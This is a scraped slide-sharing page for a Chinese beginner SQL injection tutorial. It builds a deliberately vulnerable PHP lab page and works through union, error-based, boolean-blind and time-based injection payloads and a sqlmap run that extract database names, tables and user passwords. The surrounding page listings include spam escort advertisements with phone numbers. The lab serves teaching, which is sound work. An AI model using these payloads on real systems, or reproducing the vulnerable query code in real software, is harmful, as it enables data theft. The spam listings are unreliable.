SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning Center
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
 
Hacking Your Way To Better Security
Hacking Your Way To Better SecurityHacking Your Way To Better Security
Hacking Your Way To Better Security
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016
 
Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016Hacking Your Way To Better Security - Dutch PHP Conference 2016
Hacking Your Way To Better Security - Dutch PHP Conference 2016
 
SQL Injection in JAVA
SQL Injection in JAVASQL Injection in JAVA
SQL Injection in JAVA
 
Sql injection
Sql injectionSql injection
Sql injection
 
Protecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksProtecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacks
 
PHP - Introduction to Advanced SQL
PHP - Introduction to Advanced SQLPHP - Introduction to Advanced SQL
PHP - Introduction to Advanced SQL
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)[Kerference] Nefarious SQL - 김동호(KERT)
[Kerference] Nefarious SQL - 김동호(KERT)
 
Advanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesAdvanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & Defenses
 
Sql injection
Sql injectionSql injection
Sql injection
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
DEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq liteDEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq lite
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Mutant Tests Too: The SQL
Mutant Tests Too: The SQLMutant Tests Too: The SQL
Mutant Tests Too: The SQL
 
Sql Injection
Sql InjectionSql Injection
Sql Injection
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 

More from hugo lu

Sql or no sql, that is the question
Sql or no sql, that is the questionSql or no sql, that is the question
Sql or no sql, that is the questionhugo lu
 
Swift 2.0 的新玩意
Swift 2.0 的新玩意Swift 2.0 的新玩意
Swift 2.0 的新玩意hugo lu
 
精實執行工作坊
精實執行工作坊精實執行工作坊
精實執行工作坊hugo lu
 
Testing in swift
Testing in swiftTesting in swift
Testing in swifthugo lu
 
畫出商業模式
畫出商業模式畫出商業模式
畫出商業模式hugo lu
 
精實軟體度量
精實軟體度量精實軟體度量
精實軟體度量hugo lu
 
看板實驗室
看板實驗室看板實驗室
看板實驗室hugo lu
 
嵌入式測試驅動開發
嵌入式測試驅動開發嵌入式測試驅動開發
嵌入式測試驅動開發hugo lu
 

More from hugo lu (8)

Sql or no sql, that is the question
Sql or no sql, that is the questionSql or no sql, that is the question
Sql or no sql, that is the question
 
Swift 2.0 的新玩意
Swift 2.0 的新玩意Swift 2.0 的新玩意
Swift 2.0 的新玩意
 
精實執行工作坊
精實執行工作坊精實執行工作坊
精實執行工作坊
 
Testing in swift
Testing in swiftTesting in swift
Testing in swift
 
畫出商業模式
畫出商業模式畫出商業模式
畫出商業模式
 
精實軟體度量
精實軟體度量精實軟體度量
精實軟體度量
 
看板實驗室
看板實驗室看板實驗室
看板實驗室
 
嵌入式測試驅動開發
嵌入式測試驅動開發嵌入式測試驅動開發
嵌入式測試驅動開發
 

Recently uploaded

The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...ranjana rawat
 
Extrusion Processes and Their Limitations
Extrusion Processes and Their LimitationsExtrusion Processes and Their Limitations
Extrusion Processes and Their Limitations120cr0395
 
result management system report for college project
result management system report for college projectresult management system report for college project
result management system report for college projectTonystark477637
 
University management System project report..pdf
University management System project report..pdfUniversity management System project report..pdf
University management System project report..pdfKamal Acharya
 
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...ranjana rawat
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingrknatarajan
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Call Girls in Nagpur High Profile
 
Online banking management system project.pdf
Online banking management system project.pdfOnline banking management system project.pdf
Online banking management system project.pdfKamal Acharya
 
UNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its PerformanceUNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its Performancesivaprakash250
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfKamal Acharya
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering Unit - I & II . pptThermal Engineering Unit - I & II . ppt
Thermal Engineering Unit - I & II . pptDineshKumar4165
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlysanyuktamishra911
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01KreezheaRecto
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTbhaskargani46
 
Unit 1 - Soil Classification and Compaction.pdf
Unit 1 - Soil Classification and Compaction.pdfUnit 1 - Soil Classification and Compaction.pdf
Unit 1 - Soil Classification and Compaction.pdfRagavanV2
 
data_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfdata_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfJiananWang21
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringmulugeta48
 

Recently uploaded (20)

The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
 
Extrusion Processes and Their Limitations
Extrusion Processes and Their LimitationsExtrusion Processes and Their Limitations
Extrusion Processes and Their Limitations
 
result management system report for college project
result management system report for college projectresult management system report for college project
result management system report for college project
 
University management System project report..pdf
University management System project report..pdfUniversity management System project report..pdf
University management System project report..pdf
 
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
The Most Attractive Pune Call Girls Budhwar Peth 8250192130 Will You Miss Thi...
 
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and workingUNIT-V FMM.HYDRAULIC TURBINE - Construction and working
UNIT-V FMM.HYDRAULIC TURBINE - Construction and working
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
 
Online banking management system project.pdf
Online banking management system project.pdfOnline banking management system project.pdf
Online banking management system project.pdf
 
UNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its PerformanceUNIT - IV - Air Compressors and its Performance
UNIT - IV - Air Compressors and its Performance
 
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdfONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
ONLINE FOOD ORDER SYSTEM PROJECT REPORT.pdf
 
Thermal Engineering Unit - I & II . ppt
Thermal Engineering Unit - I & II . pptThermal Engineering Unit - I & II . ppt
Thermal Engineering Unit - I & II . ppt
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01Double rodded leveling 1 pdf activity 01
Double rodded leveling 1 pdf activity 01
 
Generative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPTGenerative AI or GenAI technology based PPT
Generative AI or GenAI technology based PPT
 
NFPA 5000 2024 standard .
NFPA 5000 2024 standard .NFPA 5000 2024 standard .
NFPA 5000 2024 standard .
 
Unit 1 - Soil Classification and Compaction.pdf
Unit 1 - Soil Classification and Compaction.pdfUnit 1 - Soil Classification and Compaction.pdf
Unit 1 - Soil Classification and Compaction.pdf
 
data_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdfdata_management_and _data_science_cheat_sheet.pdf
data_management_and _data_science_cheat_sheet.pdf
 
(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
(INDIRA) Call Girl Meerut Call Now 8617697112 Meerut Escorts 24x7
 
chapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineeringchapter 5.pptx: drainage and irrigation engineering
chapter 5.pptx: drainage and irrigation engineering
 

Sql injection 幼幼班

  • 2. Wiki 定義 • SQL攻擊(SQL injection),簡稱隱碼攻擊,是發⽣生 於應⽤用程式之資料庫層的安全漏洞。簡⽽而⾔言之,是在 輸⼊入的字串之中夾帶SQL指令,在設計不良的程式當 中忽略了檢查,那麼這些夾帶進去的指令就會被資料 庫伺服器誤認為是正常的SQL指令⽽而執⾏行,因此遭到 破壞或是⼊入侵。
  • 3. ⼀一個簡單的範例 • 登⼊入驗證的SQL查詢代碼 • strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');" • 惡意填⼊入 • userName = "1' OR '1'='1"; • passWord = "1' OR '1'='1"; • SQL查詢命令變成 • strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');" • strSQL = "SELECT * FROM users;" (result=true 無帳號密碼,亦可登⼊入網站)
  • 4. SQL Injection Lab • 實驗步驟 • 設定被攻擊系統 • Union Based Injection • Error Based Injection • Boolean Based Blind Injection • Time Based Blind Injection • 使⽤用 sqlmap 分析弱點
  • 6. 新增資料庫 # mysql -uroot -pspy123 test < test.mysql # mysql -uroot -pspy123 test -e "show tables" +----------------+ | Tables_in_test | +----------------+ | fruit | | user | +----------------+ # mysql -uroot -pspy123 test -e "select * from fruit" +----+--------+ | ID | Name | +----+--------+ | 1 | apple | | 2 | banana | | 3 | cherry | | 4 | date | +----+--------+ # mysql -uroot -pspy123 test -e "select * from user" +----+------+------+ | ID | Name | Pass | +----+------+------+ | 1 | aaa | 111 | | 2 | bbb | 222 | | 3 | ccc | 333 | +----+------+------+
  • 7. hackme.php (攻擊⺫⽬目標) <?php $id= $_GET["id"]; $link = mysql_connect('localhost', 'root', 'spy123'); if (!$link) die('Not connected : ' . mysql_error()); $db_selected = mysql_select_db('test', $link); if (!$db_selected) die ('Can't use foo : ' . mysql_error()); $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;"; echo $db_query . "<hr>"; $result = mysql_query($db_query); if (!$result) die('Invalid query: ' . mysql_error()); while ($row = mysql_fetch_assoc($result)) { echo "name: " . $row['Name'] . "<br>"; } mysql_free_result($result); ?>
  • 8. ⼩小試⾝身⼿手 • 正常查詢 (https://192.168.200.61/hackme.php?id=1) • Input: 1 • Query: SELECT * FROM Test WHERE ID='1' LIMIT 0,1; • Response: name: apple • 測試 input query 是否使⽤用單引號 (SELECT * FROM Test WHERE ID='1' LIMIT 0,1;) • input: 1 >> name: apple • input: 1' >> Invalid query: You have an error in your SQL syntax... • input: 1" >> name: apple • input: 1' or '1'='1 >> name: apple
  • 10. 技術描述 • 使⽤用 UNION 將另⼀一段 SELECT 指令加掛在正常輸⼊入 後⾯面,藉此窺探系統資訊。 • The attacker appends to the affected parameter a syntactically valid SQL statement starting with an UNION ALL SELECT.
  • 11. 推測表格欄位數⺫⽬目 • 原 SQL Query 指令 • $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;"; • SQL Injection 發現 fruit table 有兩個欄位 • $db_query = "SELECT * FROM fruit WHERE ID='1' union select 1, 2-- -LIMIT 0,1;"; 被註解掉
  • 12. 找出系統資訊 Target Input Response 資料庫名稱 -1' union select 1,database()-- - name: test 系統版本 -1' union select 1,version()-- - name: 5.5.33a-MariaDB 資料庫使⽤用者 -1' union select 1,user()-- - name: root@localhost SELECT * FROM fruit WHERE ID='-1' union select 1,version()-- -' LIMIT 0,1;
  • 13. 找出表格名稱 • Input • -1' union select 1,table_name from information_schema.tables where table_schema=database()--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union select 1,table_name from information_schema.tables where table_schema=database()-- ' LIMIT 0,1; • Response • name: fruit • name: user
  • 14. 找出欄位名稱 • Input • -1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'-- ' LIMIT 0,1; • Response • name: ID • name: Name • name: Pass
  • 15. 找出表格資料 • Input • -1' union Select 1,concat(ID,", ",Name,", ",Pass) from user--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' union Select 1,concat(ID,", ",Name,", ",Pass) from user-- ' LIMIT 0,1; • Response • name: 1, aaa, 111 • name: 2, bbb, 222 • name: 3, ccc, 333
  • 17. 技術描述 • 傳遞不乾淨的輸⼊入引發資料庫錯誤,藉由產⽣生的錯誤 進⾏行窺探 • The attacker replaces or appends to the affected parameter a database-specific error message provoking statement and parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and the subquery statement output within.
  • 18. 找出當前資料庫名稱 • Input • -1' and extractvalue(0x0a,concat(0x0a,(select database())))-- + • SQL Query • SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select database())))-- ' LIMIT 0,1; • Response • Invalid query: XPATH syntax error: ' test'
  • 19. 找出當前表格名稱 • Input • -1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+ • SQL Query • SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))-- ' LIMIT 0,1; • Response • Invalid query: XPATH syntax error: ' fruit'
  • 21. 技術描述 • 有時候系統沒有那麼多的漏洞,能讓你⽤用⽅方便的⽅方式得 到答案,只好跟被攻擊者玩 是/不是 (true/false) 的遊戲。 • 透過 substring(string_to_guess, N,1)=D 資料庫查詢指 令,猜測 string_to_guess 的第 N 個字元是否為 D (⼗十進 位表⽰示) • The attacker replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user want to retrieve the output.
  • 22.
  • 23. 猜測資料庫版本 • 猜測主版本為 4 • Input:1' and substring(version(),1,1)=4--+ • SQL Query:SELECT * FROM fruit WHERE ID='1' and substring(version(), 1,1)=4-- ' LIMIT 0,1; • Response:(沒輸出資料) • 猜測主版本為 5 • Input:1' and substring(version(),1,1)=5--+ • SQL Query: SELECT * FROM fruit WHERE ID='1' and substring(version(), 1,1)=5-- ' LIMIT 0,1; • Response:name: apple
  • 24. 猜測表格名稱 • Input • 1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1), 1,1))>64--+ • SQL Query • SELECT * FROM fruit WHERE ID='1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))>64-- ' LIMIT 0,1; • Steps • >64 (有反應); >112 (無反應); >95 (有反應); >110 (無反應); >103 (無反應); 
 >100 (有反應); >102 (無反應); >101 (有反應); =102 (有反應) • 表格第⼀一個字: “f" (⼗十進位=102),重複以上步驟猜出表格名稱: "fruit"
  • 25. 猜測欄位名稱 • 猜 fruit table 第⼀一個欄位名稱的字⺟母 • 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),1,1))=73--+ • 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),2,1))=68--+ • fruit 表格第⼀一個欄位名稱: "ID" (⼗十進位=73, 68)
  • 26. 猜測欄位資料 • 表格(fruit) 第⼆二筆資料 欄位 (Name) 的值 • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),1,1))=98--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),2,1))=97--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),3,1))=110--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),4,1))=97--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),5,1))=110--+ • 1' and ascii(substring((select concat(Name) from fruit limit 1,1),6,1))=97--+ • 欄位值: “banana” (⼗十進位=98, 97, 100, 97, 110, 97)
  • 28. 技術描述 • 更糟的情形是⺫⽬目標連 是/不是 (true/false) 的遊戲都不 跟你玩,只能透過延遲時間的⽅方式窺探系統資訊。 • Time-based techniques are often used to achieve tests when there is no other way to retrieve information from the database server. This kind of attack injects a SQL segment which contains specific DBMS function or heavy query that generates a time delay.
  • 29. 猜出 SQL Query 的⽅方式 • 註解⽅方式: --+ • SQL Query: SELECT * FROM fruit WHERE ID=‘1’
  • 31. 為什麼要⽤用 sqlmap • 攻擊者不知道 SQL Query 的⻑⾧長相 • 猜測系統漏洞通常耗時費⼒力
  • 32. 指令 • # sqlmap -u "https://192.168.200.61/hackme.php? id=1" --force-ssl --dbms=mysql -p id • -u "https://192.168.200.61/..." ,要攻擊的URL • --force-ssl ,強制使⽤用 SSL/HTTPS • --dbms=mysql ,強制後端 DBMS 種類 • -p id ,要測試的參數
  • 33. Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 5529=5529 AND 'vZzG'='vZzG Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1' AND (SELECT 9346 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(9346=9346,1))),0x71766b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eHGd'='eHGd Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))VcYN) AND 'yLgG'='yLgG Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626a6a71,0x78576371715058656452616346686d506c666643427a52514775 456778504d50744e504951505a54,0x71766b7871)-- -
  • 35. Magic Quotes 被關閉了 • 防⽌止 user 端送到 server 端的資料,會被惡意內容攻擊。 • 當 magic_quotes_gpc=on 時,$_GET、$_POST、$_COOKIE 等 等從 user 端來的資料,如果含有單引號、雙引號、反斜線等內 容,會⾃自動被加⼀一條反斜線在前⾯面,把該字元跳脫掉。 • echo.php <?php echo $_GET["input"]; ?> • HTTP GET https://192.168.200.61/echo.php?input=hugo's secret magic_quotes_gpc Response On hugo's secret Off hugo's secret